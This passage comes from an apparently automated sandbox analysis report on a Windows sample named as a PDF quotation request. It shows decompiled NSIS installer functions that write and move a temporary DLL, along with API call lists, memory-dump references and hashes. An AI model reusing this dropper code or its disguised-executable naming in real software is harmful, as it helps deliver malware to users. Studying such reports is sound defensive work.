                                                                        • Associated: 00000000.00000002.656419100.000000000077A000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656424293.0000000000784000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656429564.0000000000788000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656484427.0000000000795000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656489285.00000000007A1000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656510078.00000000007A9000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656514885.00000000007AC000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: FolderFromListLocationPathSpeciallstrcatlstrlen
                                                                        • String ID: C:\Program Files$CommonFilesDir$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
                                                                        • API String ID: 4227507514-3711765563
                                                                        • Opcode ID: bb177ee3615b619df9c73ca70b65f722049f4b351553e2cdd88049d5eba40c88
                                                                        • Instruction ID: 88f6e72dca0f61d75e3a0e3e21e18f1b78018e843eea250326dc72cf64c4fd20
                                                                        • Opcode Fuzzy Hash: bb177ee3615b619df9c73ca70b65f722049f4b351553e2cdd88049d5eba40c88
                                                                        • Instruction Fuzzy Hash: 20512671904A44AAEB206B248C84B7F3B74EB52324F20823BF941B62C2D77C7941DF5E
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 32%
                                                                        			E004026FA() {
                                                                        				void* _t23;
                                                                        				void* _t28;
                                                                        				long _t33;
                                                                        				struct _OVERLAPPED* _t48;
                                                                        				void* _t51;
                                                                        				void* _t53;
                                                                        				void* _t54;
                                                                        				CHAR* _t55;
                                                                        				void* _t58;
                                                                        				void* _t59;
                                                                        				void* _t60;
                                                                        
                                                                        				 *((intOrPtr*)(_t60 - 0x34)) = 0xfffffd66;
                                                                        				_t54 = E00402A9A(_t48);
                                                                        				_t23 = E00405538(_t54);
                                                                        				_push(_t54);
                                                                        				if(_t23 == 0) {
                                                                        					lstrcatA(E004054CC(E004059BF("C:\Users\jones\AppData\Local\Temp\nsa82C7.tmp\fsfomt.dll", "C:\\Users\\jones\\AppData\\Local\\Temp")), ??);
                                                                        					_t55 = 0x40a018;
                                                                        				} else {
                                                                        					_push(0x40a018);
                                                                        					E004059BF();
                                                                        				}
                                                                        				E00405BFB(_t55);
                                                                        				_t28 = E00405690(_t55, 0x40000000, 2);
                                                                        				 *(_t60 + 8) = _t28;
                                                                        				if(_t28 != 0xffffffff) {
                                                                        					_t33 =  *0x7a2f8c;
                                                                        					 *(_t60 - 0x2c) = _t33;
                                                                        					_t53 = GlobalAlloc(0x40, _t33);
                                                                        					if(_t53 != _t48) {
                                                                        						E004030FF(_t48);
                                                                        						E004030CD(_t53,  *(_t60 - 0x2c));
                                                                        						_t58 = GlobalAlloc(0x40,  *(_t60 - 0x1c));
                                                                        						 *(_t60 - 0x30) = _t58;
                                                                        						if(_t58 != _t48) {
                                                                        							_push( *(_t60 - 0x1c));
                                                                        							_push(_t58);
                                                                        							_push(_t48);
                                                                        							_push( *((intOrPtr*)(_t60 - 0x20)));
                                                                        							E00402EBD();
                                                                        							while( *_t58 != _t48) {
                                                                        								_t59 = _t58 + 8;
                                                                        								 *(_t60 - 0x38) =  *_t58;
                                                                        								E00405670( *((intOrPtr*)(_t58 + 4)) + _t53, _t59,  *_t58);
                                                                        								_t58 = _t59 +  *(_t60 - 0x38);
                                                                        							}
                                                                        							GlobalFree( *(_t60 - 0x30));
                                                                        						}
                                                                        						WriteFile( *(_t60 + 8), _t53,  *(_t60 - 0x2c), _t60 - 0x44, _t48);
                                                                        						GlobalFree(_t53);
                                                                        						_push(_t48);
                                                                        						_push(_t48);
                                                                        						_push( *(_t60 + 8));
                                                                        						_push(0xffffffff);
                                                                        						 *((intOrPtr*)(_t60 - 0x34)) = E00402EBD();
                                                                        					}
                                                                        					CloseHandle( *(_t60 + 8));
                                                                        					_t55 = 0x40a018;
                                                                        				}
                                                                        				_t51 = 0xfffffff3;
                                                                        				if( *((intOrPtr*)(_t60 - 0x34)) < _t48) {
                                                                        					_t51 = 0xffffffef;
                                                                        					DeleteFileA(_t55);
                                                                        					 *((intOrPtr*)(_t60 - 4)) = 1;
                                                                        				}
                                                                        				_push(_t51);
                                                                        				E00401428();
                                                                        				 *0x7a3008 =  *0x7a3008 +  *((intOrPtr*)(_t60 - 4));
                                                                        				return 0;
                                                                        			}
                                                                        0x004026fb
                                                                        0x00402707
                                                                        0x0040270a
                                                                        0x00402711
                                                                        0x00402712
                                                                        0x00402737
                                                                        0x0040273c
                                                                        0x00402714
                                                                        0x00402719
                                                                        0x0040271a
                                                                        0x0040271a
                                                                        0x00402742
                                                                        0x0040274f
                                                                        0x00402757
                                                                        0x0040275a
                                                                        0x00402760
                                                                        0x0040276e
                                                                        0x00402773
                                                                        0x00402777
                                                                        0x0040277a
                                                                        0x00402783
                                                                        0x0040278f
                                                                        0x00402793
                                                                        0x00402796
                                                                        0x00402798
                                                                        0x0040279b
                                                                        0x0040279c
                                                                        0x0040279d
                                                                        0x004027a0
                                                                        0x004027bf
                                                                        0x004027ac
                                                                        0x004027b4
                                                                        0x004027b7
                                                                        0x004027bc
                                                                        0x004027bc
                                                                        0x004027c6
                                                                        0x004027c6
                                                                        0x004027d8
                                                                        0x004027df
                                                                        0x004027e5
                                                                        0x004027e6
                                                                        0x004027e7
                                                                        0x004027ea
                                                                        0x004027f1
                                                                        0x004027f1
                                                                        0x004027f7
                                                                        0x004027fd
                                                                        0x004027fd
                                                                        0x00402807
                                                                        0x00402808
                                                                        0x0040280c
                                                                        0x0040280e
                                                                        0x00402814
                                                                        0x00402814
                                                                        0x0040281b
                                                                        0x004021e8
                                                                        0x00402932
                                                                        0x0040293e

                                                                        APIs
                                                                        • lstrcatA.KERNEL32(00000000,00000000,C:\Users\user\AppData\Local\Temp\nsa82C7.tmp\fsfomt.dll,C:\Users\user\AppData\Local\Temp,00000000,00000000), ref: 00402737
                                                                        • GlobalAlloc.KERNEL32(00000040,?,C:\Users\user\AppData\Local\Temp\nsa82C7.tmp\fsfomt.dll,40000000,00000002,C:\Users\user\AppData\Local\Temp\nsa82C7.tmp\fsfomt.dll,00000000,00000000,C:\Users\user\AppData\Local\Temp\nsa82C7.tmp\fsfomt.dll,C:\Users\user\AppData\Local\Temp,00000000,00000000), ref: 00402771
                                                                        • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 0040278D
                                                                        • GlobalFree.KERNEL32 ref: 004027C6
                                                                        • WriteFile.KERNEL32(?,00000000,?,?), ref: 004027D8
                                                                        • GlobalFree.KERNEL32 ref: 004027DF
                                                                        • CloseHandle.KERNEL32(?), ref: 004027F7
                                                                        • DeleteFileA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsa82C7.tmp\fsfomt.dll,C:\Users\user\AppData\Local\Temp\nsa82C7.tmp\fsfomt.dll,40000000,00000002,C:\Users\user\AppData\Local\Temp\nsa82C7.tmp\fsfomt.dll,00000000,00000000,C:\Users\user\AppData\Local\Temp\nsa82C7.tmp\fsfomt.dll,C:\Users\user\AppData\Local\Temp,00000000,00000000), ref: 0040280E
                                                                          • Part of subcall function 004059BF: lstrcpynA.KERNEL32(?,?,00000400,0040319C,007A2780,NSIS Error), ref: 004059CC
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.656376259.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.656371436.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656383603.0000000000407000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656389325.0000000000409000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656419100.000000000077A000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656424293.0000000000784000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656429564.0000000000788000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656484427.0000000000795000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656489285.00000000007A1000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656510078.00000000007A9000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656514885.00000000007AC000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: Global$AllocFileFree$CloseDeleteHandleWritelstrcatlstrcpyn
                                                                        • String ID: C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\nsa82C7.tmp\fsfomt.dll
                                                                        • API String ID: 3508600917-2253332803
                                                                        • Opcode ID: d89732e6fba566c184c8790af0f9760d3bcc362a7ab7685eaae326e05ea9e627
                                                                        • Instruction ID: 0812298b90ecd2d5aad5402bcd4d52469fb6612ace7046921d2b432afa3f8679
                                                                        • Opcode Fuzzy Hash: d89732e6fba566c184c8790af0f9760d3bcc362a7ab7685eaae326e05ea9e627
                                                                        • Instruction Fuzzy Hash: 1631CD71C01618BBDB116FA5CE89DAF7A38EF45324B10823AF914772D1CB7C5D019BA9
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 94%
                                                                        			E00404D62(CHAR* _a4, CHAR* _a8) {
                                                                        				struct HWND__* _v8;
                                                                        				signed int _v12;
                                                                        				CHAR* _v32;
                                                                        				long _v44;
                                                                        				int _v48;
                                                                        				void* _v52;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				CHAR* _t26;
                                                                        				signed int _t27;
                                                                        				CHAR* _t28;
                                                                        				long _t29;
                                                                        				signed int _t39;
                                                                        
                                                                        				_t26 =  *0x7a2764;
                                                                        				_v8 = _t26;
                                                                        				if(_t26 != 0) {
                                                                        					_t27 =  *0x4092a0; // 0x6
                                                                        					_v12 = _t27;
                                                                        					_t39 = _t27 & 0x00000001;
                                                                        					if(_t39 == 0) {
                                                                        						E004059E1(0, _t39, 0x79ed60, 0x79ed60, _a4);
                                                                        					}
                                                                        					_t26 = lstrlenA(0x79ed60);
                                                                        					_a4 = _t26;
                                                                        					if(_a8 == 0) {
                                                                        						L6:
                                                                        						if((_v12 & 0x00000004) != 0) {
                                                                        							_t26 = SetWindowTextA( *0x7a2748, 0x79ed60);
                                                                        						}
                                                                        						if((_v12 & 0x00000002) != 0) {
                                                                        							_v32 = 0x79ed60;
                                                                        							_v52 = 1;
                                                                        							_t29 = SendMessageA(_v8, 0x1004, 0, 0);
                                                                        							_v44 = 0;
                                                                        							_v48 = _t29 - _t39;
                                                                        							SendMessageA(_v8, 0x1007 - _t39, 0,  &_v52);
                                                                        							_t26 = SendMessageA(_v8, 0x1013, _v48, 0);
                                                                        						}
                                                                        						if(_t39 != 0) {
                                                                        							_t28 = _a4;
                                                                        							 *((char*)(_t28 + 0x79ed60)) = 0;
                                                                        							return _t28;
                                                                        						}
                                                                        					} else {
                                                                        						_t26 =  &(_a4[lstrlenA(_a8)]);
                                                                        						if(_t26 < 0x800) {
                                                                        							_t26 = lstrcatA(0x79ed60, _a8);
                                                                        							goto L6;
                                                                        						}
                                                                        					}
                                                                        				}
                                                                        				return _t26;
                                                                        			}
                                                                        0x00404d68
                                                                        0x00404d74
                                                                        0x00404d77
                                                                        0x00404d7d
                                                                        0x00404d89
                                                                        0x00404d8c
                                                                        0x00404d8f
                                                                        0x00404d95
                                                                        0x00404d95
                                                                        0x00404d9b
                                                                        0x00404da3
                                                                        0x00404da6
                                                                        0x00404dc3
                                                                        0x00404dc7
                                                                        0x00404dd0
                                                                        0x00404dd0
                                                                        0x00404dda
                                                                        0x00404de3
                                                                        0x00404def
                                                                        0x00404df6
                                                                        0x00404dfa
                                                                        0x00404dfd
                                                                        0x00404e10
                                                                        0x00404e1e
                                                                        0x00404e1e
                                                                        0x00404e22
                                                                        0x00404e24
                                                                        0x00404e27
                                                                        0x00000000
                                                                        0x00404e27
                                                                        0x00404da8
                                                                        0x00404db0
                                                                        0x00404db8
                                                                        0x00404dbe
                                                                        0x00000000
                                                                        0x00404dbe
                                                                        0x00404db8
                                                                        0x00404da6
                                                                        0x00404e31

                                                                        APIs
                                                                        • lstrlenA.KERNEL32(0079ED60,00000000,0078ED38,00789938,?,?,?,?,?,?,?,?,?,00402FF7,00000000,?), ref: 00404D9B
                                                                        • lstrlenA.KERNEL32(00402FF7,0079ED60,00000000,0078ED38,00789938,?,?,?,?,?,?,?,?,?,00402FF7,00000000), ref: 00404DAB
                                                                        • lstrcatA.KERNEL32(0079ED60,00402FF7,00402FF7,0079ED60,00000000,0078ED38,00789938), ref: 00404DBE
                                                                        • SetWindowTextA.USER32(0079ED60,0079ED60), ref: 00404DD0
                                                                        • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404DF6
                                                                        • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404E10
                                                                        • SendMessageA.USER32(?,00001013,?,00000000), ref: 00404E1E
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.656376259.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.656371436.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656383603.0000000000407000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656389325.0000000000409000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656419100.000000000077A000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656424293.0000000000784000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656429564.0000000000788000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656484427.0000000000795000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656489285.00000000007A1000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656510078.00000000007A9000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656514885.00000000007AC000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                        • String ID: `y
                                                                        • API String ID: 2531174081-1740403070
                                                                        • Opcode ID: edad6dc2de89f9ed618421ce26d5d36bc75d71d20e9e6f22415f143a986efb4b
                                                                        • Instruction ID: cb3b45f852b3c740c34d3f7777c40130103cf21f354e3c75b2961a2ef6a5418a
                                                                        • Opcode Fuzzy Hash: edad6dc2de89f9ed618421ce26d5d36bc75d71d20e9e6f22415f143a986efb4b
                                                                        • Instruction Fuzzy Hash: 5C2160B1900118BBDB119F99DD85DDEBFA9FF45354F14807AFA04B6291C7398E40CBA8
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E00405BFB(CHAR* _a4) {
                                                                        				char _t5;
                                                                        				char _t7;
                                                                        				char* _t15;
                                                                        				char* _t16;
                                                                        				CHAR* _t17;
                                                                        
                                                                        				_t17 = _a4;
                                                                        				if( *_t17 == 0x5c && _t17[1] == 0x5c && _t17[2] == 0x3f && _t17[3] == 0x5c) {
                                                                        					_t17 =  &(_t17[4]);
                                                                        				}
                                                                        				if( *_t17 != 0 && E00405538(_t17) != 0) {
                                                                        					_t17 =  &(_t17[2]);
                                                                        				}
                                                                        				_t5 =  *_t17;
                                                                        				_t15 = _t17;
                                                                        				_t16 = _t17;
                                                                        				if(_t5 != 0) {
                                                                        					do {
                                                                        						if(_t5 > 0x1f &&  *((char*)(E004054F7("*?|<>/\":", _t5))) == 0) {
                                                                        							E00405670(_t16, _t17, CharNextA(_t17) - _t17);
                                                                        							_t16 = CharNextA(_t16);
                                                                        						}
                                                                        						_t17 = CharNextA(_t17);
                                                                        						_t5 =  *_t17;
                                                                        					} while (_t5 != 0);
                                                                        				}
                                                                        				 *_t16 =  *_t16 & 0x00000000;
                                                                        				while(1) {
                                                                        					_t16 = CharPrevA(_t15, _t16);
                                                                        					_t7 =  *_t16;
                                                                        					if(_t7 != 0x20 && _t7 != 0x5c) {
                                                                        						break;
                                                                        					}
                                                                        					 *_t16 =  *_t16 & 0x00000000;
                                                                        					if(_t15 < _t16) {
                                                                        						continue;
                                                                        					}
                                                                        					break;
                                                                        				}
                                                                        				return _t7;
                                                                        			}

                                                                        APIs
                                                                        • CharNextA.USER32(?,*?|<>/":,00000000,Error writing temporary file. Make sure your temp folder is valid.,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403122,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 00405C53
                                                                        • CharNextA.USER32(?,?,?,00000000,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403122,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 00405C60
                                                                        • CharNextA.USER32(?,Error writing temporary file. Make sure your temp folder is valid.,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403122,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 00405C65
                                                                        • CharPrevA.USER32(?,?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403122,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 00405C75
                                                                        Strings
                                                                        • Error writing temporary file. Make sure your temp folder is valid., xrefs: 00405C37
                                                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00405BFB, 00405BFC
                                                                        • *?|<>/":, xrefs: 00405C43
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.656376259.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.656371436.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656383603.0000000000407000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656389325.0000000000409000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656419100.000000000077A000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656424293.0000000000784000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656429564.0000000000788000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656484427.0000000000795000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656489285.00000000007A1000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656510078.00000000007A9000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656514885.00000000007AC000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: Char$Next$Prev
                                                                        • String ID: *?|<>/":$C:\Users\user\AppData\Local\Temp\$Error writing temporary file. Make sure your temp folder is valid.
                                                                        • API String ID: 589700163-562438032
                                                                        • Opcode ID: c3e6b7e6cb13a4bbd62a9e478f04b3777cedf0421140d3393f81b5e1ccfcad21
                                                                        • Instruction ID: 741f4f1766c378bb4ac774d7bbda26dd0b1b0e4f9567a31439ebc024b01f0e93
                                                                        • Opcode Fuzzy Hash: c3e6b7e6cb13a4bbd62a9e478f04b3777cedf0421140d3393f81b5e1ccfcad21
                                                                        • Instruction Fuzzy Hash: 7B11D05180CB9429FB3216284D44BBB7B98CB9B760F18047BE9C4722C2D67C5C828B6D
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E00403E0E(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
                                                                        				struct tagLOGBRUSH _v16;
                                                                        				long _t35;
                                                                        				long _t37;
                                                                        				void* _t40;
                                                                        				long* _t49;
                                                                        
                                                                        				if(_a4 + 0xfffffecd > 5) {
                                                                        					L15:
                                                                        					return 0;
                                                                        				}
                                                                        				_t49 = GetWindowLongA(_a12, 0xffffffeb);
                                                                        				if(_t49 == 0) {
                                                                        					goto L15;
                                                                        				}
                                                                        				_t35 =  *_t49;
                                                                        				if((_t49[5] & 0x00000002) != 0) {
                                                                        					_t35 = GetSysColor(_t35);
                                                                        				}
                                                                        				if((_t49[5] & 0x00000001) != 0) {
                                                                        					SetTextColor(_a8, _t35);
                                                                        				}
                                                                        				SetBkMode(_a8, _t49[4]);
                                                                        				_t37 = _t49[1];
                                                                        				_v16.lbColor = _t37;
                                                                        				if((_t49[5] & 0x00000008) != 0) {
                                                                        					_t37 = GetSysColor(_t37);
                                                                        					_v16.lbColor = _t37;
                                                                        				}
                                                                        				if((_t49[5] & 0x00000004) != 0) {
                                                                        					SetBkColor(_a8, _t37);
                                                                        				}
                                                                        				if((_t49[5] & 0x00000010) != 0) {
                                                                        					_v16.lbStyle = _t49[2];
                                                                        					_t40 = _t49[3];
                                                                        					if(_t40 != 0) {
                                                                        						DeleteObject(_t40);
                                                                        					}
                                                                        					_t49[3] = CreateBrushIndirect( &_v16);
                                                                        				}
                                                                        				return _t49[3];
                                                                        			}

                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.656376259.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        Similarity
                                                                        • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                        • String ID:
                                                                        • API String ID: 2320649405-0
                                                                        • Opcode ID: c97ffb24e4734704427e7b606a740b4fab5c3533c49fee8400ef737fc9d4ca7c
                                                                        • Instruction ID: 944c776da9ffcbc306ecb8e42b0009ed864c9b653f4a8b06b4458955b6ce273b
                                                                        • Opcode Fuzzy Hash: c97ffb24e4734704427e7b606a740b4fab5c3533c49fee8400ef737fc9d4ca7c
                                                                        • Instruction Fuzzy Hash: 25214F71904744ABCB219F68DD08B5BBFF8AF00715B048A69F895E22E1D738EA04CB95
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 78%
                                                                        			E0040166B() {
                                                                        				int _t18;
                                                                        				void* _t28;
                                                                        				void* _t35;
                                                                        
                                                                        				 *(_t35 + 8) = E00402A9A(0xffffffd0);
                                                                        				 *(_t35 - 8) = E00402A9A(0xffffffdf);
                                                                        				E004059BF(0x40a018,  *(_t35 + 8));
                                                                        				_t18 = lstrlenA( *(_t35 - 8));
                                                                        				if(_t18 + lstrlenA( *(_t35 + 8)) < 0x3fd) {
                                                                        					lstrcatA(0x40a018, 0x40901c);
                                                                        					lstrcatA(0x40a018,  *(_t35 - 8));
                                                                        				}
                                                                        				if(MoveFileA( *(_t35 + 8),  *(_t35 - 8)) == 0) {
                                                                        					if( *((intOrPtr*)(_t35 - 0x1c)) == _t28 || E00405C94( *(_t35 + 8)) == 0) {
                                                                        						 *((intOrPtr*)(_t35 - 4)) = 1;
                                                                        					} else {
                                                                        						E00405707( *(_t35 + 8),  *(_t35 - 8));
                                                                        						_push(0xffffffe4);
                                                                        						goto L7;
                                                                        					}
                                                                        				} else {
                                                                        					_push(0xffffffe3);
                                                                        					L7:
                                                                        					E00401428();
                                                                        				}
                                                                        				 *0x7a3008 =  *0x7a3008 +  *((intOrPtr*)(_t35 - 4));
                                                                        				return 0;
                                                                        			}

                                                                        APIs
                                                                          • Part of subcall function 004059BF: lstrcpynA.KERNEL32(?,?,00000400,0040319C,007A2780,NSIS Error), ref: 004059CC
                                                                        • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\nsa82C7.tmp\fsfomt.dll,?,000000DF,000000D0), ref: 00401690
                                                                        • lstrlenA.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\nsa82C7.tmp\fsfomt.dll,?,000000DF,000000D0), ref: 0040169A
                                                                        • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsa82C7.tmp\fsfomt.dll,0040901C,?,?,C:\Users\user\AppData\Local\Temp\nsa82C7.tmp\fsfomt.dll,?,000000DF,000000D0), ref: 004016AF
                                                                        • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsa82C7.tmp\fsfomt.dll,?,C:\Users\user\AppData\Local\Temp\nsa82C7.tmp\fsfomt.dll,0040901C,?,?,C:\Users\user\AppData\Local\Temp\nsa82C7.tmp\fsfomt.dll,?,000000DF,000000D0), ref: 004016B8
                                                                          • Part of subcall function 00405C94: SetErrorMode.KERNELBASE(00008001,00000000,007A0988,C:\Users\user\AppData\Local\Temp\,004055EF,007A0988,007A0988,00000000,007A0988,007A0988,?,?,00000000,00405315,?,"C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe" ), ref: 00405CA2
                                                                          • Part of subcall function 00405C94: FindFirstFileA.KERNELBASE(?,007A15D0), ref: 00405CAE
                                                                          • Part of subcall function 00405C94: SetErrorMode.KERNELBASE(00000000), ref: 00405CB8
                                                                          • Part of subcall function 00405C94: FindClose.KERNELBASE(00000000), ref: 00405CC0
                                                                          • Part of subcall function 00405707: CloseHandle.KERNEL32(00000000,?,00000000,00000001,KERNEL32.dll,MoveFileExA,?,00000000,?,?,004054BC,?,00000000,000000F1,?), ref: 0040575C
                                                                          • Part of subcall function 00405707: GetShortPathNameA.KERNEL32(?,007A1710,00000400), ref: 00405765
                                                                          • Part of subcall function 00405707: GetShortPathNameA.KERNEL32(00000000,007A1188,00000400), ref: 00405782
                                                                          • Part of subcall function 00405707: wsprintfA.USER32 ref: 004057A0
                                                                          • Part of subcall function 00405707: GetWindowsDirectoryA.KERNEL32(007A1188,000003F0,?,?,00000000,000000F1,?), ref: 004057B1
                                                                          • Part of subcall function 00405707: lstrcatA.KERNEL32(007A1188,\wininit.ini,?,?,00000000,000000F1,?), ref: 004057BD
                                                                          • Part of subcall function 00405707: CreateFileA.KERNEL32(007A1188,C0000000,00000000,00000000,00000004,08000080,00000000,007A1188,\wininit.ini,?,?,00000000,000000F1,?), ref: 004057D4
                                                                          • Part of subcall function 00405707: GetFileSize.KERNEL32(00000000,00000000,?,?,00000000,000000F1,?), ref: 004057E8
                                                                          • Part of subcall function 00405707: GlobalAlloc.KERNEL32(00000040,0000000A,?,?,00000000,000000F1,?), ref: 004057F7
                                                                          • Part of subcall function 00405707: ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,000000F1,?), ref: 0040580D
                                                                        • MoveFileA.KERNEL32(?,?), ref: 004016C3
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.656376259.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        Similarity
                                                                        • API ID: File$lstrcat$CloseErrorFindModeNamePathShortlstrlen$AllocCreateDirectoryFirstGlobalHandleMoveReadSizeWindowslstrcpynwsprintf
                                                                        • String ID: C:\Users\user\AppData\Local\Temp\nsa82C7.tmp\fsfomt.dll
                                                                        • API String ID: 2621199633-1876267922
                                                                        • Opcode ID: e34dedb074c22f8b75bca2a446b82d177209b2bfd9f99b0c9f35470352dc7494
                                                                        • Instruction ID: fea5f1e5da9c35cb7cab6b6f1408056446a07f0d4044b317f115ce8379a8f22b
                                                                        • Opcode Fuzzy Hash: e34dedb074c22f8b75bca2a446b82d177209b2bfd9f99b0c9f35470352dc7494
                                                                        • Instruction Fuzzy Hash: 7D11A031904214FBCF016FA2CD0899E3A62EF41368F20413BF401751E1DA3D8A81AF5D
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E00404627(struct HWND__* _a4, intOrPtr _a8) {
                                                                        				long _v8;
                                                                        				signed char _v12;
                                                                        				unsigned int _v16;
                                                                        				void* _v20;
                                                                        				intOrPtr _v24;
                                                                        				long _v56;
                                                                        				void* _v60;
                                                                        				long _t15;
                                                                        				unsigned int _t19;
                                                                        				signed int _t25;
                                                                        				struct HWND__* _t28;
                                                                        
                                                                        				_t28 = _a4;
                                                                        				_t15 = SendMessageA(_t28, 0x110a, 9, 0);
                                                                        				if(_a8 == 0) {
                                                                        					L4:
                                                                        					_v56 = _t15;
                                                                        					_v60 = 4;
                                                                        					SendMessageA(_t28, 0x110c, 0,  &_v60);
                                                                        					return _v24;
                                                                        				}
                                                                        				_t19 = GetMessagePos();
                                                                        				_v16 = _t19 >> 0x10;
                                                                        				_v20 = _t19;
                                                                        				ScreenToClient(_t28,  &_v20);
                                                                        				_t25 = SendMessageA(_t28, 0x1111, 0,  &_v20);
                                                                        				if((_v12 & 0x00000066) != 0) {
                                                                        					_t15 = _v8;
                                                                        					goto L4;
                                                                        				}
                                                                        				return _t25 | 0xffffffff;
                                                                        			}

                                                                        APIs
                                                                        • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 00404642
                                                                        • GetMessagePos.USER32 ref: 0040464A
                                                                        • ScreenToClient.USER32 ref: 00404664
                                                                        • SendMessageA.USER32(?,00001111,00000000,?), ref: 00404676
                                                                        • SendMessageA.USER32(?,0000110C,00000000,?), ref: 0040469C
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.656376259.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.656371436.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656383603.0000000000407000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656389325.0000000000409000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656419100.000000000077A000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656424293.0000000000784000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656429564.0000000000788000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656484427.0000000000795000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656489285.00000000007A1000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656510078.00000000007A9000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656514885.00000000007AC000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: Message$Send$ClientScreen
                                                                        • String ID: f
